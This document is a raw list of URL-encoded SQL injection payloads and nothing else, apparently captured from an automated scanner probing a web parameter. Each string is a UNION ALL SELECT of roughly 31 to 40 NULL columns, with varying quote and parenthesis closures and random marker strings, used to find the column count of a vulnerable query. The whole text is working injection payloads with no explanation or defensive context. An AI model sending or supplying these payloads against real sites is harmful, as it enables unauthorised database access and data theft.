1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27SPVn%27%3D%27SPVn 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27OHLK%27%3D%27OHLK 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27kUGm%27%3D%27kUGm 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27DtsL%27%3D%27DtsL 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27yStf%27%3D%27yStf 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27wKFg%27%3D%27wKFg 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27ybOb%27%3D%27ybOb 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27aPiQ%27%3D%27aPiQ 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27ceOA%27%3D%27ceOA 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27qxtV%27%20LIKE%20%27qxtV 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27pbcv%27%20LIKE%20%27pbcv 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27rNtO%27%20LIKE%20%27rNtO 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27Gkxq%27%20LIKE%20%27Gkxq 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27VyPt%27%20LIKE%20%27VyPt 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27MsRd%27%20LIKE%20%27MsRd 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27abSU%27%20LIKE%20%27abSU 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27lHbW%27%20LIKE%20%27lHbW 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27SPoY%27%20LIKE%20%27SPoY 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27wQEO%27%20LIKE%20%27wQEO 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27ezGF%27%20LIKE%20%27ezGF 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27YhMr%27%20LIKE%20%27YhMr 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27Wpxo%27%20LIKE%20%27Wpxo 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27Sehj%27%20LIKE%20%27Sehj 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27jSjx%27%20LIKE%20%27jSjx 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27qBcC%27%20LIKE%20%27qBcC 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27YoNF%27%20LIKE%20%27YoNF 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27DFNN%27%20LIKE%20%27DFNN 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27ttvW%27%20LIKE%20%27ttvW 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27FWsK%27%20LIKE%20%27FWsK 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27TtuG%27%20LIKE%20%27TtuG 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27Cpjt%27%20LIKE%20%27Cpjt 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27fyaC%27%20LIKE%20%27fyaC 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27vYlH%27%20LIKE%20%27vYlH 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27TwDA%27%20LIKE%20%27TwDA 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27nPbA%27%20LIKE%20%27nPbA 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27ZelF%27%20LIKE%20%27ZelF 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27sjjP%27%20LIKE%20%27sjjP 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27tFTu%27%20LIKE%20%27tFTu 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27Jnwa%27%20LIKE%20%27Jnwa 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27loYT%27%20LIKE%20%27loYT 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27dqWD%27%20LIKE%20%27dqWD 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27swlX%27%20LIKE%20%27swlX 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27RrFZ%27%20LIKE%20%27RrFZ 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27pmXy%27%20LIKE%20%27pmXy 